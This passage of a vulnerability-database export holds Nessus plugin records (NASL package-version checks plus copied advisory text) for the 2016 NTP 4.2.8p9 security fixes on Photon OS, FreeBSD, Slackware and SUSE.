(rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", 
reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:55:07", "description": "Network Time Foundation reports :\n\nNTF's NTP Project is releasing ntp-4.2.8p9, which addresses :\n\n- 1 HIGH severity vulnerability that only affects Windows\n\n- 2 MEDIUM severity vulnerabilities\n\n- 2 MEDIUM/LOW severity vulnerabilities\n\n- 5 LOW severity vulnerabilities\n\n- 28 other non-security fixes and improvements\n\nAll of the security issues in this release are listed in VU#633847.", "edition": 33, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-11-23T00:00:00", "title": "FreeBSD : ntp -- multiple vulnerabilities (8db8d62a-b08b-11e6-8eba-d050996490d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", 
"CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-11-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ntp-devel", "p-cpe:/a:freebsd:freebsd:ntp"], "id": "FREEBSD_PKG_8DB8D62AB08B11E68EBAD050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/95265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95265);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2016-9312\");\n script_xref(name:\"CERT\", value:\"633847\");\n\n script_name(english:\"FreeBSD : ntp -- multiple vulnerabilities (8db8d62a-b08b-11e6-8eba-d050996490d0)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Network Time Foundation reports :\n\nNTF's NTP Project is releasing ntp-4.2.8p9, which addresses :\n\n- 1 HIGH severity vulnerability that only affects Windows\n\n- 2 MEDIUM severity vulnerabilities\n\n- 2 MEDIUM/LOW severity vulnerabilities\n\n- 5 LOW severity vulnerabilities\n\n- 28 other non-security fixes and improvements\n\nAll of the security issues in this release are listed in VU#633847.\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://www.nessus.org/u?08645c8c\"\n );\n # https://vuxml.freebsd.org/freebsd/8db8d62a-b08b-11e6-8eba-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1bdee1b1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.8p9\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ntp-devel>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T09:10:56", "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix security issues.", "edition": 24, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-11-22T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : ntp (SSA:2016-326-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-11-22T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:ntp", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-326-01.NASL", 
"href": "https://www.tenable.com/plugins/nessus/95028", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-326-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95028);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2016-9312\");\n script_xref(name:\"SSA\", value:\"2016-326-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : ntp (SSA:2016-326-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.641761\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?271e3ad7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", 
pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-02-08T12:48:10", "description": "An update of [guile,ntp] packages for PhotonOS has been released.", "edition": 4, "published": "2018-08-17T00:00:00", "title": "Photon OS 1.0: Guile / Ntp / Ntpstat PHSA-2017-0003 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-8606", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ntpstat", "p-cpe:/a:vmware:photonos:ntp", "cpe:/o:vmware:photonos:1.0", "p-cpe:/a:vmware:photonos:guile"], "id": "PHOTONOS_PHSA-2017-0003.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111852", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0003. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111852);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-8606\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\"\n );\n\n script_name(english:\"Photon OS 1.0: Guile / Ntp / Ntpstat PHSA-2017-0003 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [guile,ntp] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-19\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dd0a069\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8606\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:guile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntpstat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"guile-2.0.13-1.ph1\",\n \"guile-debuginfo-2.0.13-1.ph1\",\n \"guile-devel-2.0.13-1.ph1\",\n \"ntp-4.2.8p9-1.ph1\",\n \"ntp-debuginfo-4.2.8p9-1.ph1\",\n \"ntpstat-4.2.8p9-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"guile / ntp / ntpstat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-20T14:46:56", "description": "This update for ntp fixes the following issues :\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365). 
Security issues fixed\n (update to 4.2.8p9) :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\n - CVE-2015-8140: ntpq vulnerable to replay attacks.\n\n - CVE-2015-8139: Origin Leak: ntpq and ntpdc, disclose\n origin.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 39, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-21T00:00:00", "title": "SUSE SLES11 Security Update : ntp (SUSE-SU-2016:3193-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8140", "CVE-2016-7434", "CVE-2016-9311", "CVE-2015-5219", "CVE-2016-7433", "CVE-2015-8139", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ntp-doc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2016-3193-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95986", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3193-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95986);\n script_version(\"3.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2015-8139\", \"CVE-2015-8140\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n\n script_name(english:\"SUSE SLES11 Security Update : ntp (SUSE-SU-2016:3193-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Simplify ntpd's search for its own executable to 
prevent\n AppArmor warnings (bsc#956365). Security issues fixed\n (update to 4.2.8p9) :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\n - CVE-2015-8140: ntpq vulnerable to replay attacks.\n\n - CVE-2015-8139: Origin Leak: ntpq and ntpdc, disclose\n origin.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1009434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011406\"\n );\n script_set_attribute(\n 